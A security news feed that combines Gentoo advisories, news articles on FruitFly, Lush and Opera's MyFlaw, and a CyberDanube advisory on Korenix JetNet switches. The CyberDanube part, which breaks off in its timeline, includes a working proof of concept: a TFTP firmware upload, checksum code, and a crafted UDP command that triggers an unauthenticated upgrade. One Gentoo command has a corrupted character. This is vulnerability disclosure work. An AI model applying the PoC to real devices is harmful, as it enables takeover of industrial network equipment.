Gentoo Linux Security Advisory 202401-21 - A vulnerability has been found in KTextEditor where local code can be executed without user interaction. Versions greater than or equal to 5.90.0-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: KTextEditor: Arbitrary Local Code Execution  
     Date: January 15, 2024  
     Bugs: #832447  
       ID: 202401-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in KTextEditor where local code can be  
executed without user interaction.

Background  
=========  
Framework providing a full text editor component for KDE.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  ------------  
kde-frameworks/ktexteditor  < 5.90.0-r2   >= 5.90.0-r2

Description  
==========  
A vulnerability has been discovered in KTextEditor. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
KTextEditor executes binaries without user interaction in a few cases,  
e.g. KTextEditor will try to check on external file modification via  
invoking the "git" binary if the file is known in the repository with  
the new content.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All KTextEditor users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=kde-frameworks/ktexteditor-5.90.0-r2"

References  
=========  
[ 1 ] CVE-2022-23853  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23853

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-21

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-21

Gentoo Linux Security Advisory 202401-20 - A vulnerability has been found in QPDF which can lead to a heap-based buffer overflow. Versions greater than or equal to 10.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: QPDF: Buffer Overflow  
     Date: January 15, 2024  
     Bugs: #803110  
       ID: 202401-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in QPDF which can lead to a heap-based  
buffer overflow.

Background  
=========  
QPDF: A content-preserving PDF document transformer.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-text/qpdf  < 10.1.0      >= 10.1.0

Description  
==========  
A vulnerability has been discovered in QPDF. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
QPDF has a heap-based buffer overflow in Pl_ASCII85Decoder::write  
(called from Pl_AES_PDF::flush and Pl_AES_PDF::finish) when a certain  
downstream write fails.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All QPDF users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/qpdf-10.1.0"

References  
=========  
[ 1 ] CVE-2021-36978  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36978

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-20

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-20

Gentoo Linux Security Advisory 202401-19 - Multiple vulnerabilities have been found in Opera, the worst of which can lead to remote code execution. Versions greater than or equal to 73.0.3856.284 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Opera: Multiple Vulnerabilities  
     Date: January 15, 2024  
     Bugs: #750929  
       ID: 202401-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Opera, the worst of which  
can lead to remote code execution.

Background  
=========  
Opera is a fast web browser that is available free of charge.

Affected packages  
================  
Package                Vulnerable       Unaffected  
---------------------  ---------------  ----------------  
www-client/opera       < 73.0.3856.284  >= 73.0.3856.284  
www-client/opera-beta  < 73.0.3856.284  >= 73.0.3856.284

Description  
==========  
Multiple vulnerabilities have been discovered in Opera. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Opera users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/opera-73.0.3856.284"

All Opera users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/opera-beta-73.0.3856.284"

References  
=========  
[ 1 ] CVE-2020-15999  
      https://nvd.nist.gov/vuln/detail/CVE-2020-15999

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-19

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-19

Almost seven years after alleged FruitFly author Phillip Durachinsky’s arrest, judge Solomon Oliver has ruled he's incompetent to stand trial.

On January 4, 2017, Case Western Reserve University (CWRU), located in Cleveland, Ohio, became aware of an infection on more than 100 of its computers. The university was notified by an undisclosed third party, who provided information to help the team find and identify the malware.

CWRU began working with the FBI, who determined that the systems had been infected for several years. Together, CWRU and the FBI were able to identify that an IP address with which the malware was communicating had also been used to access the alumni email account of a man called Phillip Durachinsky.

On January 10 2017, and unaware of this ongoing investigation, Malwarebytes became aware of the Mac version of the malware that would become known as FruitFly. We shared our investigation with Apple, and learned that it was working with the FBI and calling the malware “FruitFly” internally.

On January 25, 2017, Durachinsky was arrested for involvement with the FruitFly malware. On December 7, 2023 – nearly 7 years later – a judge ruled that Durachinsky is incompetent to stand trial.

****Who is Phillip Durachinsky?****

Durachinsky, a resident of northeast Ohio, was seen by his peers as “awkward and eccentric” throughout grade school and college. Despite this, he was active in extracurricular activities. In high school, he participated in a computer club. As a member of the club, he competed in a local programming competition, helping the team to win in both 2005 and 2006. Interviewed by a local newspaper reporter following one of these wins, Durachinsky said, “It’s about teamwork, knowing your strengths and weaknesses to help the team.”

In college at CWRU, he participated in a philosophy club, where he was “interested in the philosophy behind mathematics.” In 2012, as a senior soon to graduate with a physics degree, he worked on a project with faculty member Robert W. Brown regarding nanoparticle behavior, assisting with software to visualize the behavior in 3D.

However, Durachinsky was frequently in trouble for his other computing activities. He was rumored to have hacked into his high school’s computer system, although those rumors were never confirmed. While at CWRU, he was accused of “cracking passwords” on a CWRU network. In an interview following his 2017 arrest, a local law enforcement representative said that Durachinsky was “not unknown to the authorities.”

Initial investigation of the FruitFly malware showed something very interesting: some of the code in the malware was extremely old. There were many references to functions that dated back to the early days of the Macintosh, and that had been deprecated in macOS for years. (This led to Malwarebytes initially using the name “Quimitchin” for the malware, after the name for ancient Aztec spies that infiltrated enemy tribes. This name did not catch on.)

FruitFly included a number of very powerful capabilities, including file exfiltration, screen capture, execution of arbitrary commands, and remote access to the webcam and microphone. The FBI found more than 20 million files collected from victim machines on hardware confiscated from Durachinsky’s home.

According to an FBI Flash document released to affected organizations on March 27, 2017, machines were infected with FruitFly via brute force attacks, using weak passwords or passwords from breaches of other systems. (The latter is referred to as “credential stuffing.”)

> “The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.”
> 
> FBI Flash

In this manner, thousands of computers were infected over more than a decade.

****Arrest and arraignment****

Apple had been acting as an intermediary, coordinating with both the FBI and Malwarebytes. On January 18, 2017, all three organizations took simultaneous actions. Apple released a security update to protect users against FruitFly, Malwarebytes published a blog post with technical details about the malware, and the FBI knocked on the door of the house linked to the IP address used by the malware. (The IP address was linked to the malware using data collected by CWRU, Malwarebytes, and AT&T.)

The house, as it turned out, was the home of Durachinsky’s parents, who allowed the agents to enter and mentioned that Durachinsky had been in trouble in high school for breaking into his high school’s website and hacking into teachers’ email.

The FBI found a laptop in Durachinsky’s room. When they entered the room, the laptop lid was slightly ajar, and agents were able to see that the cursor was moving – indicating that it was being remotely accessed – and that the control panel for the malware was visible on the screen. Agents disconnected the network router to prevent further remote access, which could have resulted in deletion of evidence. Also found were numerous hard drives.

On January 19, a judge signed a warrant allowing the FBI to examine the contents of the laptop and hard drives. As a result of the evidence found, Durachinsky was arrested on January 25. Following numerous requests by the defense and changes in Durachinsky’s legal representation, he was finally arraigned nearly a year later, on January 19, 2018.

Durachinsky was charged with 16 counts, including accessing and damaging computers without authorization, accessing a non-public government computer without authorization, production of child pornography, three counts of wire fraud, four counts of aggravated identity theft, and five counts of illegal wiretapping.

During the lengthy trial, it was the child pornography charge that seemed to be of most concern to the defense. Repeated attempts were made to evade it, including an attempt to suppress evidence due to claims of improper seizure, an attempt to suppress a confession made by Durachinsky, and an attempt to separate that charge from all the others and try it separately.

****Ruling****

Almost seven years after Durachinsky’s arrest, judge Solomon Oliver ruled that Durachinsky was incompetent to stand trial, by reason of being unable to assist in his own defense due to autism spectrum disorder (ASD). If psychologists determine that his “condition” can be treated to restore his competency, the trial will continue. Otherwise, he will be civilly committed.

Interestingly, although both prosecuting and defense attorneys agree on the competency ruling, Durachinsky himself does not. He has been cited as saying, “I don’t challenge the autism disorder diagnosis, but I disagree with the way this has been prosecuted.”

This ruling has caused some concerns in the information security community. ASD is not something that can be “cured,” though therapy can help to teach people on the spectrum how to improve social and communication skills. This can take years, however.

Some have expressed skepticism about the ruling, arguing that Durachinsky’s activities and public statements suggest that, like many affected by high-functioning ASD, he appears to be fully capable of understanding his situation and knowing the difference between right and wrong.

Others have expressed concerns about how this case has proceeded. Seven years of jail time without ever having been found guilty in a court of law is concerning. Although the evidence seems pretty damning, and it has been fully expected that Durachinsky would be found guilty, the US justice system is supposed to presume a defendant to be innocent until proven guilty.

****What next?****

It’s unclear what’s next for Mr. Durachinsky, but it would seem the saga is not yet over. Presumably he will be – or has been – released from jail, but there’s still the question of civil commitment. It’s unclear exactly what that will mean – whether this would require time in an institution and, if so, for how long. It’s also unclear whether there will be any kind of treatment that the court deems successful at restoring his competency, in which case the trial could resume.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Alleged FruitFly malware creator ruled incompetent to stand trial 

By Waqas
From Bubbles to Bytes: Lush investigates 'cyber incident' without giving any substantial information to customers.
This is a post from HackRead.com Read the original post: British Cosmetics Retailer Lush Investigating Cyber Attack

Lush Retail Ltd., a popular British cosmetics retailer headquartered in Poole, Dorset, is investigating a cyber attack. Still, it is unclear whether it is a ransomware attack, a data breach, or a DDoS attack causing disruption.

Lush Retail Ltd., a British cosmetics retailer is surrounded by uncertainty after confirming a cybersecurity incident is brewing within the company. While details remain scarce, the news has left customers and industry experts alike wondering just how deep the fragrant rabbit hole goes.

The company broke the news through a brief statement, admitting they are “currently responding to a cybersecurity incident,” but stopping short of revealing the attack’s nature or potential targets. This cryptic stance has only fueled speculation, with concerns ranging from customer data breaches to operational disruptions.

“We take cybersecurity exceptionally seriously,” stressed the statement, attempting to quell rising worry. “We have informed relevant authorities and are working with external IT forensic specialists to conduct a thorough investigation.”

> _“Lush UK&I is currently responding to a cyber security incident and working with external IT forensic specialists to undertake a comprehensive investigation. The investigation is at an early stage but we have taken immediate steps to secure and screen all systems in order to contain the incident and limit the impact on our operations. We take cyber security exceptionally seriously and have informed relevant authorities.”_

This move suggests the attack might be more than a minor hiccup, potentially involving sensitive data or wider security implications. The potential scenarios storming around this incident paint a troubling picture:

*   **Data breach:** Customer names, addresses, and even payment information could be on the line if hackers breached Lush’s systems.
*   **Ransomware attack:** The company’s operations could be held hostage by malicious actors demanding payment to unlock vital data.
*   **Disruption of operations:** Production, distribution, and sales channels could be thrown into disarray, impacting both employees and customers.

Experts caution against complacency, urging users to remain vigilant towards suspicious emails or communications claiming to be from Lush.

“It hasn’t been confirmed what type of attack Lush is facing, but it does sound like ransomware,” said William Wright, CEO of Closed Door Security. “The threat is used to take an organisation’s data hostage, so a big part of recovery is working on containing the attack and limiting its spread.”

“More details should be released around the attack, but the most worrying issue with the incident is the type of data criminals could potentially have access to. Whether it be company data, or sensitive customer information, given the popularity of Lush it will undoubtedly be a gold mine for criminals,” Wright warned.

While the investigation unfolds, Lush customers can take proactive steps:

*   **Change passwords:** Update credentials for any online accounts associated with Lush as a precautionary measure.
*   **Beware phishing:** Approach emails and communications claiming to be from Lush with caution. Avoid clicking links or opening attachments unless their legitimacy is certain.
*   **Monitor credit reports:** Keep an eye out for suspicious activity that could signal unauthorized access to financial information.

Should Lush decide to disclose additional information about the cyber attack, Hackread.com will update this article accordingly. However, one certainty remains: the United Kingdom has been experiencing an unprecedented surge in cyber attacks over the past few months.

Earlier this month, it was reported that hackers launched a calculated cyber attack on the UK’s Nuclear Waste Services through LinkedIn. A few months before that, in November 2023, Samsung disclosed a data breach in which hackers stole customer data in the UK.

In October 2023, UK power and data manufacturer Volex fell victim to a cyber attack. During the same month, reports surfaced that Vietnamese DarkGate malware targeted META accounts nationwide.

****_RELATED ARTICLES_****

1.  **UK Royal Family Website Hit by DDoS Attack from KillNet**
2.  **UK Air Traffic Control System Collapses, Causing Travel Chaos**
3.  **Cyberattack on UK IT Firm Swan Retail Affects up to 300 Retailers**
4.  **UK’s Ofcom confirms cyber attack as PoC exploit for MOVEit is released**
5.  **UK Electoral Commission Admits Major Data Breach Spanning Over a Year**

British Cosmetics Retailer Lush Investigating Cyber Attack

Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system.
The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it

Vulnerability / Browser Security

Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system.

The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it possible to sync messages and files between mobile and desktop devices.

"This is achieved through a controlled browser extension, effectively bypassing the browser's sandbox and the entire browser process," the company said in a statement shared with The Hacker News.

The issue impacts both the Opera browser and Opera GX. Following responsible disclosure on November 17, 2023, it was addressed as part of updates shipped on November 22, 2023.

My Flow features a chat-like interface to exchange notes and files, the latter of which can be opened via a web interface, meaning a file can be executed outside of the browser's security boundaries.

It is pre-installed in the browser and facilitated by means of a built-in (or internal) browser extension called "Opera Touch Background," which is responsible for communicating with its mobile counterpart.

This also means that the extension comes with its own manifest file specifying all the required permissions and its behavior, including a property known as externally\_connectable that declares which other web pages and extensions can connect to it.

In the case of Opera, the domains that can talk to the extension should match the patterns "\*.flow.opera.com" and ".flow.op-test.net" – both controlled by the browser vendor itself.

"This exposes the messaging API to any page that matches the URL patterns you specify," Google notes in its documentation. "The URL pattern must contain at least a second-level domain."

Guardio Labs said it was able to unearth a "long-forgotten" version of the My Flow landing page hosted on the domain "web.flow.opera.com" using the urlscan.io website scanner tool.

"The page itself looks quite the same as the current one in production, but changes lie under the hood: Not only that it lacks the \[content security policy\] meta tag, but it also holds a script tag calling for a JavaScript file without any integrity check," the company said.

"This is exactly what an attacker needs – an unsafe, forgotten, vulnerable to code injection asset, and most importantly, has access to (very) high permission native browser API."

The attack chain then hinges, creating a specially crafted extension that masquerades as a mobile device to pair with the victim's computer and transmit an encrypted malicious payload via the modified JavaScript file to the host for subsequent execution by prompting the user to click anywhere on the screen.

The findings highlight the increasing complexity of browser-based attacks and the different vectors that can be exploited by threat actors to their advantage.

"Despite operating in sandboxed environments, extensions can be powerful tools for hackers, enabling them to steal information and breach browser security boundaries," the company told The Hacker News.

"This underscores the need for internal design changes at Opera and improvements in Chromium's infrastructure. For instance, disabling third-party extension permissions on dedicated production domains, similar to Chrome's web store, is recommended but has not yet been implemented by Opera."

When reached for comment, Opera said it moved quickly to close the security hole and implement a fix on the server side and that it's taking steps to prevent such issues from happening again.

"Our current structure uses an HTML standard, and is the safest option that does not break key functionality," the company said. "After Guardio alerted us to this vulnerability, we removed the cause of these issues and we are making sure that similar problems will not appear in the future."

"We would like to thank Guardio Labs for their work on uncovering and immediately alerting us to this vulnerability. This collaboration demonstrates how we work together with security experts and researchers around the world to complement our own efforts at maintaining and improving the security of our products and ensuring our users have a safe online experience."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Opera MyFlaw Bug Could Let Hackers Run ANY File on Your Mac or Windows

Gentoo Linux Security Advisory 202401-18 - A vulnerability has been found in zlib that can lead to a heap-based buffer overflow. Versions greater than or equal to 1.2.13-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: zlib: Buffer Overflow  
     Date: January 15, 2024  
     Bugs: #916484  
       ID: 202401-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in zlib that can lead to a heap-based  
buffer overflow.

Background  
=========  
zlib is a widely used free and patent unencumbered data compression  
library.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-libs/zlib  < 1.2.13-r2   >= 1.2.13-r2

Description  
==========  
A vulnerability has been discovered in zlib. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
MiniZip in zlib through 1.3 has an integer overflow and resultant heap-  
based buffer overflow in ZipOpenNewFileInZip4_64 via a long filename,  
comment, or extra field.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All zlib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-libs/zlib-1.2.13-r2"

References  
=========  
[ 1 ] CVE-2023-45853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45853

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-18

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-18

Gentoo Linux Security Advisory 202401-17 - A vulnerability has been found in libgit2 which could result in privilege escalation. Versions greater than or equal to 1.4.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libgit2: Privilege Escalation Vulnerability  
     Date: January 14, 2024  
     Bugs: #857792  
       ID: 202401-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in libgit2 which could result in  
privilege escalation.

Background  
=========  
libgit2 is a portable, pure C implementation of the Git core methods  
provided as a re-entrant linkable library with a solid API.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/libgit2  < 1.4.4       >= 1.4.4

Description  
==========  
A vulnerability has been discovered in libgit2. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
Usages of a malicious crafted Git repository could allow the creator of  
the repository to elevate privileges to those of the user accessing the  
repository.

Workaround  
=========  
Administrators can ensure that their usages of libgit2 only interact  
with repositories which have only been modified by trusted users.

Resolution  
=========  
All libgit2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libgit2-1.4.4"

References  
=========  
[ 1 ] CVE-2022-29187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29187

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-17

Korenix JetNet Series allows TFTP without authentication and also allows for unauthenticated firmware upgrades.

    CyberDanube Security Research 20240109-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| Korenix JetNet Series   vulnerable version| See "Vulnerable versions"        fixed version| -           CVE number| CVE-2023-5376, CVE-2023-5347               impact| High             homepage| https://www.korenix.com/                found| 2023-08-31                   by| S. Dietz (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.With decades of experiences in the industry, we have developed various productlines [...].Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customerbase covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. [...]"Source: https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable versions-------------------------------------------------------------------------------Tested on emulated Korenix JetNet 5310G / v2.6All vulnerable models/versions according to vendor:JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3,       4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3,       4508f-sw V2.3)JetNet 5620G-4C V1.1JetNet 5612GP-4F V1.2JetNet 5612G-4F V1.2JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0,       6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)JetNet 6628XP-4F-US V1.1JetNet 6628X-4F-EU V1.0JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0,       6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0,       6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)JetNet 6910G-M12 HVDC V1.0JetNet 7310G-V2 2.0JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0,       7628XP-4F-EU V1.1JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0JetNet 7714G-M12 HVDC V1.0Vulnerability overview-------------------------------------------------------------------------------1) TFTP Without Authentication (CVE-2023-5376)The available tftp service is accessable without user authentication. Thisallows the user to upload and download files to the restricted "/home" folder.2) Unauthenticated Firmware Upgrade (CVE-2023-5347)A critical security vulnerability has been identified that may allow anunauthenticated attacker to compromise the integrity of a device or cause adenial of service (DoS) condition. This vulnerability resides in the firmwareupgrade process of the affected system.Proof of Concept-------------------------------------------------------------------------------1) TFTP Without Authentication (CVE-2023-5376)The Linux tftp client was used to upload a firmware to the absolute path"/home/firmware.bin":# tftp $IPtftp> put exploit.bin /home/firmware.binSent 5520766 bytes in 5.7 seconds2) Unauthenticated Firmware Upgrade (CVE-2023-5347)Unauthenticated attackers can exploit this by uploading malicious firmware viaTFTP and initializing the upgrade process with a crafted UDP packet on port5010.We came to the conclusion that the firmware image consists of multiplesections. Our interpretation of these can be seen below:===============================================================================class FirmwarePart:    def init(self, name, offset, size):        self.name = name        self.offset = offset        self.size = sizefirmware_parts = [    FirmwarePart("uimage_header", 0x0, 0x40),    FirmwarePart("uimage_kernel", 0x40, 0x3c54),    FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),    FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),    FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),]===============================================================================The squashfs includes the rootfs. Metadata includes a 4 byte checksum whichneeds to be modified when repacked. During our analysis we observed that thechecksum gets calculated over all sections except metadata. To test thisvulnerability we reimplemented the checksum calculation at offset 0x9bdc inthe binary "/bin/cmd-server2":===============================================================================#include <stdio.h>#include <stdint.h>#include <stdlib.h>int32_t check_file(const char* arg1) {    FILE* r0 = fopen(arg1, "rb");    if (!r0) {        return 0xffffffff;    }    int32_t filechecksum = 0;    int32_t last_data_size = 0;    int32_t file_size = 0;    uint8_t data_buf[4096];    int32_t data_len = 1;    while (data_len > 0) {        data_len = fread(data_buf, 1, sizeof(data_buf), r0);        if (data_len == 0) {            break;        }        int32_t counter = 0;        while (counter < (data_len >> 2)) {            int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));            counter++;            filechecksum += byte_at_counter;        }        file_size += data_len;        last_data_size = data_len;    }    fclose(r0);    if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size - 0x14a  000) > 0x5ac000)) {        return 0xffffffff;    }    data_len = 0;    while (data_len < (last_data_size >> 2)) {        int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));        data_len++;        filechecksum -= r3_2;    }    return filechecksum;}int main(int argc, char* argv[]) {    if (argc != 2) {        printf("Usage: %s <file_path>\n", argv[0]);        return 1;    }    int32_t result = check_file(argv[1]);    printf("0x%x\n", result);    return 0;}===============================================================================After modifying and repacking the squashfs, we calculated the checksum,patched the required bytes in the metadata section (offset 0x11b-0x11e) andinitilized the update process.===============================================================================# tftp $IPtftp> put exploit.bin /home/firmware.binSent 5520766 bytes in 5.7 seconds# echo -e "\x00\x00\x00\x1f\x00\x00\x00\x01\x01" | nc -u $IP 5010===============================================================================The output of the serial console can be observed below:===============================================================================Jan  1 00:01:00 Jan  1 00:01:00 syslog: UDP cmd is receivedJan  1 00:01:00 Jan  1 00:01:00 syslog: management vlan = sw0.0Jan  1 00:01:00 Jan  1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such deviJan  1 00:01:00 Jan  1 00:01:00 syslog: tlv_count = 0Jan  1 00:01:00 Jan  1 00:01:00 syslog: rec_bytes = 10Jan  1 00:01:00 Jan  1 00:01:00 syslog: command TLV_FW_UPGRADE receivedcheck firmware...checksum=b2256313, inFileChecksum=b2256313Firmware upgrading, don't turn off the switch!Begin erasing flash:.Write firmware.bin (5480448 Bytes) to flash:...Write finished...Terminating child processes...Jan  1 00:01:01 Jan  1 00:01:01 syslog: first time create tlv_chainJan  1 00:01:01 syslogd exitingFirmware upgrade success!!waiting for reboot command .......===============================================================================The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Beijer/Korenix provided a workaround to mitigate the vulnerabilities until aproper patch is available (see "Workaround" section).Workaround-------------------------------------------------------------------------------Beijer representatives provided the following workaround for mitigating thevulnerabilities on devices of the JetNet series:"Login by terminal:Switch# configure terminalSwitch(config)# service ipscan disableSwitch(config)# tftpd disableSwitch(config)# copy running-config startup-config"Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947This commands should be used to deactivate the TFTP daemon on the device toprevent unauthenticated actors from abusing the service.Recommendation-------------------------------------------------------------------------------Regardless to the current state of the vulnerability, CyberDanube recommendscustomers from Korenix to upgrade the firmware to the latest version available.Furthermore, a full security review by professionals is recommended.Contact Timeline-------------------------------------------------------------------------------31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.31-08-2023: Receiving contact information. Send vulnerability information.26-09-2023: Asking about vulnerability status and receiving update release date.27-10-2023: Received update from contact regarding the firmware update.29-11-2023: 